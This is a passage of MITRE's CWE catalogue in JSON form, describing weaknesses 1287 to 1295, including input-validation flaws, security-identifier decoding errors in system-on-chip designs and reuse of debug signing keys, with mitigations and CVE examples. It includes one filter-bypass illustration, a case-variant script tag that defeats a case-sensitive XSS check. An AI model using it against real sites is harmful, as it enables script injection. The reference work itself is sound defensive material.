loaded without validating it against a known XML Schema or DTD."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-5893","Description":"HTTP request with missing protocol version number leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5893"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"66"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1287":{"attr":{"@_ID":"1287","@_Name":"Improper Validation of Specified Type of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.","Extended_Description":{"xhtml:p":["When input does not comply with the expected type, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities that would not be possible if the input conformed with the expected type.","This weakness can appear in type-unsafe programming languages, or in programming languages that support casting or conversion of an input to another type."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"843","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1288":{"attr":{"@_ID":"1288","@_Name":"Improper Validation of Consistency within Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.","Extended_Description":{"xhtml:p":"Some input data can be structured with multiple elements or fields that must be consistent with each other, e.g. a number-of-items field that is followed by the expected number of elements.  When such complex inputs are inconsistent, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-16733","Description":"product does not validate that the start block appears before the end block","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16733"},{"Reference":"CVE-2006-3790","Description":"size field that is inconsistent with packet size leads to buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3790"},{"Reference":"CVE-2008-4114","Description":"system crash with offset value that is inconsistent with packet size","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1289":{"attr":{"@_ID":"1289","@_Name":"Improper Validation of Unsafe Equivalence in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value.","Extended_Description":{"xhtml:p":"Attackers can sometimes bypass input validation schemes by finding inputs that appear to be safe, but will be dangerous when processed at a lower layer or by a downstream component.  For example, a simple XSS protection mechanism might try to validate that an input has no \\"&lt;script&gt;\\" tags using case-sensitive matching, but since HTML is case-insensitive when processed by web browsers, an attacker could inject \\"&lt;ScrIpT&gt;\\" and trigger XSS."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"178","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0269","Description":"File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0269"},{"Reference":"CVE-2001-1238","Description":"Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1238"},{"Reference":"CVE-2004-2214","Description":"HTTP server allows bypass of access restrictions using URIs with mixed case.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2214"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1290":{"attr":{"@_ID":"1290","@_Name":"Incorrect Decoding of Security Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. The security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes). A decoder decodes the bus transactions to map security identifiers into necessary access-controls/protections.","A common weakness that can exist in this scenario is incorrect decoding because an untrusted agent\u2019s security identifier is decoded into a trusted agent\u2019s security identifier. Thus, an untrusted agent previously without access to an asset can now gain access to the asset."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security identifier decoders must be reviewed for design consistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing in order to check for this weakness."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system that has four bus masters and a decoder. The table below provides bus masters as well as their security identifiers and trust assumptions:","The decoder is supposed to decode every bus transaction and assign a corresponding security identifier. The security identifier is used to determine accesses to the assets.","The bus transaction that contains the security information is Bus_transaction [15:14], and the bits 15 through 14 contain the security identifier in formation.","The assets are the AES-Key register\u2019s AES key for encryption or decryption. The key is128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.\\nThe access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The size of the security identifier is 4 bits (i.e., bit 3 through 0. Each bit in these 4 bits defines a security identifier. There are only 4 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows respective action from an agent whose identity matches the number of the bit and, if \u201c0\u201d (i.e., Clear), disallows the respective action to that corresponding agent."],"xhtml:table":[{"xhtml:tr":[{"xhtml:td":["Bus Master","Security Identifier Decoding","Trust Assumptions"]},{"xhtml:td":["Master_0","\\"00\\"","Untrusted"]},{"xhtml:td":["Master_1","\\"01\\"","Trusted"]},{"xhtml:td":["Master_2","\\"10\\"","Untrusted"]},{"xhtml:td":["Master_3","\\"11\\"","Untrusted"]}]},{"xhtml:tr":[{"xhtml:td":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:4] Default 0x000000\\n[3:0] \u2013 0x02 agent with Security Identifier \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}],"xhtml:br":"","xhtml:div":{"#text":"Pseudo CodeIf (AES_KEY_ACCESS_POLICY[Security_Identifier] == \u201c1\u201d)Else","xhtml:br":["","","",""],"xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}}]}},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"Below is a decoder\u2019s Pseudo code that only checks for bit [14] of the bus transaction to determine what Security Identifier it must assign.If (Bus_transaction[14] == \u201c1\u201d)Else","xhtml:br":["","","",""],"xhtml:div":[{"#text":"Security_Identifier == \u201c1\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c0\u201d","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"The decoder should check for the entire size of the security identifier in the bus-transaction signal to assign a corresponding security identifier. The following is good Pseudo code:If (Bus_transaction[15:14] == \u201c00\u201d)If (Bus_transaction[15:14] == \u201c01\u201d)If (Bus_transaction[15:14] == \u201c10\u201d)If (Bus_transaction[15:14] == \u201c11\u201d)","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"Security_Identifier == \u201c0\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c1\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c2\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c3\u201d","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"Upon close observation of the security identifiers and the above code, it looks like the Master_3, an untrusted agent, has access to the AES-Key registers in addition to the intended trusted Master_1 because both have their bit \u201c0\u201d set to \u201c1\u201d."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"629"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1291":{"attr":{"@_ID":"1291","@_Name":"Public Key Re-Use for Signing both Debug and Production Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The same public key is used for signing both debug and production code.","Extended_Description":{"xhtml:p":["A common usage of public-key cryptography is to verify the integrity and authenticity of another entity (for example a firmware binary). If a company wants to ensure that its firmware runs only on its own hardware, before the firmware runs, an encrypted hash of the firmware image will be decrypted with the public key and then verified against the now-computed hash of the firmware image. This means that the public key forms the root of trust, which necessitates that the public key itself must be protected and used properly.","During the development phase, debug firmware enables many hardware debug hooks, debug modes, and debug messages for testing. Those debug facilities provide significant, additional views about the firmware\u2019s capability and, in some cases, additional capability into the chip or SoC. If compromised, these capabilities could be exploited by an attacker to take full control of the system.","Once the product exits the manufacturing stage and enters production, it is good practice to use a different public key. Debug firmware images are known to leak. With the debug key being reused as the production key, the debug image will also work on the production image. Thus, it will open all the internal, debug capabilities to the attacker.","If a different public key is used for the production image, even if the attacker gains access to the debug firmware image, they will not be able to run it on a production machine. Thus, damage will be limited to the intellectual property leakage resulting from the debug image."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"321","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation","Other"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Varies by Context"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:p":"Compare the debug key with the production key to make sure that they are not the same."},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Compare the debug key with the production key to make sure that they are not the same."},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use different keys for Production and Debug"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example illustrates the danger of using the same public key for debug and production.","Example_Code":[{"#text":"Suppose the product design requires frugality of silicon real estate. Assume that originally the architecture allows just enough storage for two 2048-bit RSA keys in the fuse: one to be used for debug and the other for production. However, in the meantime, a business decision is taken to make the security future-proof beyond 2030, which means the architecture needs to use the NIST-recommended 3072-bit keys instead of the originally-planned 2048-bit keys. This means that, at most, one key can be fully stored in the fuses, not two. So the product design team decides to use the same public key for debug and production.","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":""},{"#text":"Increase the storage so that two different keys of the required size can be stored.","attr":{"@_Nature":"informative","@_Language":"Other"},"xhtml:div":""}]}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-26"}}},"1292":{"attr":{"@_ID":"1292","@_Name":"Incorrect Conversion of Security Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. This security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes).","A typical bus connects several leader and follower agents. Some follower agents implement bus protocols differently from leader agents. A protocol conversion happens at a bridge to seamlessly connect different protocols on the bus. One example is a system that implements a leader with the Advanced High-performance Bus (AHB) protocol and a follower with the Open-Core Protocol (OCP). A bridge AHB-to-OCP is needed to translate the transaction from one form to the other.","A common weakness that can exist in this scenario is that this conversion between protocols is implemented incorrectly, whereupon an untrusted agent may gain unauthorized access to an asset."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security identifier decoders must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system that supports AHB. Let us assume we have a follower agent that only understands OCP. To connect this follower to the leader, a bridge is introduced, i.e., AHB to OCP.","The follower has assets to protect accesses from untrusted leaders, and it employs access controls based on policy, (e.g., AES-Key registers for encryption or decryption). The key is 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.","The AES_KEY_ACCESS_POLICY access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The implemented AES_KEY_ACCESS_POLICY has 4 bits where each bit when \u201cSet\u201d allows access to the AES-Key registers to the corresponding agent that has the security identifier. The other bits from 31 through 4 are reserved and not used.","During conversion of the AHB-to-OCP transaction, the security identifier information must be preserved and passed on to the follower correctly."],"xhtml:table":{"xhtml:tr":[{"xhtml:td":["Register","Field Description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:4] Default 0x000000 [3:0] \u2013 0x02 agent with Security Identifier \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}},"Example_Code":[{"#text":"In AHB-to-OCP bridge, the security identifier information conversion is done incorrectly.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The conversion of the signals from one protocol (AHB) to another (OCP) must be done while preserving the security identifier correctly.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"Because of the incorrect conversion, the security identifier information is either lost or could be modified in such a way that an untrusted leader can access the AES-Key registers."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"629"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1293":{"attr":{"@_ID":"1293","@_Name":"Missing Source Correlation of Multiple Independent Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software relies on one source of data, preventing the ability to detect if an adversary has compromised a data source.","Extended_Description":{"xhtml:p":"Software has to implicitly trust the integrity of an information source. When information is implicitly signed, one can ensure that the data was not tampered in transit. This does not ensure that the information source was not compromised when responding to a request. By requesting information from multiple sources, one can check if all of the data is the same. If they are not, the system should report the information sources that respond with a different or minority value as potentially compromised. If there are not enough answers to provide a majority or plurality of responses, the system should report all of the sources as potentially compromised. As the seriousness of the impact of incorrect integrity increases, so should the number of independent information sources that would need to be queried."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"654","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This flaw could be introduced during the design of the application or misconfiguration at run time by only specifying a single point of validation."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."},{"Phase":"Operation","Note":"This weakness could be introduced by intentionally failing all but one of the devices used to retrieve the data or by failing the devices that validate the data."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Gain Privileges or Assume Identity"],"Note":"An attacker that may be able to execute a single Person-in-the-Middle attack can subvert a check of an external oracle (e.g. the ACME protocol check for a file on a website), and thus inject an arbitrary reply to the single perspective request to the external oracle."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Design system to use a Practical Byzantine fault method, to request information from multiple sources to verify the data and report on potentially compromised information sources."},{"Phase":"Implementation","Description":"Failure to use a Practical Byzantine fault method when requesting data. Lack of place to report potentially compromised information sources. Relying on non-independent information sources for integrity checking. Failure to report information sources that respond in the minority to incident response procedures."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1125"}},{"attr":{"@_External_Reference_ID":"REF-1126"}},{"attr":{"@_External_Reference_ID":"REF-1127"}}]},"Content_History":{"Submission":{"Submission_Name":"Kurt Seifried","Submission_Organization":"Cloud Security Alliance","Submission_Date":"2020-04-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description, Relationships"}}},"1294":{"attr":{"@_ID":"1294","@_Name":"Insecure Security Identifier Mechanism","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The System-on-Chip (SoC) implements a Security Identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Identifiers are not correctly implemented.","Extended_Description":{"xhtml:p":["Systems-On-Chip (Integrated circuits and hardware\\n                    engines) implement Security Identifiers to\\n                    differentiate/identify actions originated from various\\n                    agents. These actions could be \'read\', \'write\', \'program\',\\n                    \'reset\', \'fetch\', \'compute\', etc. Security identifiers are\\n                    generated and assigned to every agent in the System (SoC)\\n                    that is either capable of generating an action or receiving\\n                    an action from another agent. Every agent could be assigned\\n                    a unique, Security Identifier based on its trust level or\\n                    privileges.","A broad class of flaws can exist in the Security\\n                    Identifier process, including but not limited to missing\\n                    security identifiers, improper conversion of security\\n                    identifiers, incorrect generation of security identifiers,\\n                    etc."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security Identifier Decoders must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-07-17"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1295":{"attr":{"@_ID":"1295","@_Name":"Debug Messages Revealing Unnecessary Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product fails to adequately prevent the revealing of unnecessary and potentially sensitive system information within debugging messages.","Extended_Description":{"xhtml:p":"Debug messages are messages that help troubleshoot an issue by revealing 